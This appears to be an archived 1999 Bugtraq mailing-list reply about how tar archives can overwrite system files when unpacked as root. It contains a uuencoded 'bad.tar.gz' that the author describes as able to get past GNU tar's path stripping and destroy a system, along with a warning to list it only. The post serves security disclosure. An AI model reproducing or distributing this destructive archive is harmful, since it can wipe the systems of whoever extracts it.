[12357] in bugtraq
Re: Linux kernel source problem
daemon@ATHENA.MIT.EDU (David F. Skoll)
Wed Oct 27 15:10:41 1999
Content-Type: text
Message-Id: <199910261957.PAA00874@nepal.carleton.ca>
Date: Tue, 26 Oct 1999 15:57:39 -0400
Reply-To: "David F. Skoll" <dfs@DOE.CARLETON.CA>
From: "David F. Skoll" <dfs@DOE.CARLETON.CA>
X-To: bugtraq@securityfocus.org
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991025220621.34194@morgana.systemy.it> from "Alessandro
Rubini" at Oct 25, 99 10:06:21 pm
> If you want to damage your own system, untar the appended sample tar
> file as root (fortunately, GNU tar strips the leading "/" by default).
However, a little creative binary editing can spoof even GNU tar and destroy
your system, to wit:
begin 644 bad.tar.gz
M'XL(")\%%C@"`V)A9"YT87(`[=%-#L(@$$!AUCW%W(`IA9+T-M7:V(T8J7I]
M?V/B0EVUT?B^!9,`"\+K4S)3*YW&&,6(2*S#T[S3\XYJ\.I\<"*E"[4:<78U
M+NVVS?G83?:X?1[;G8CIVL/0Y=?W/IW_J'Z._JJU]V_Z5]6C?_"7_AK*:$3G
M^(`_[[]+:6P:;:[3WM;%L+%Y71@`````````````````WZTX`;CJ>H@!*```
`
end
Please DO NOT unpack the above tar file as root! Just look at
the contents with the "t" option.
--
David.
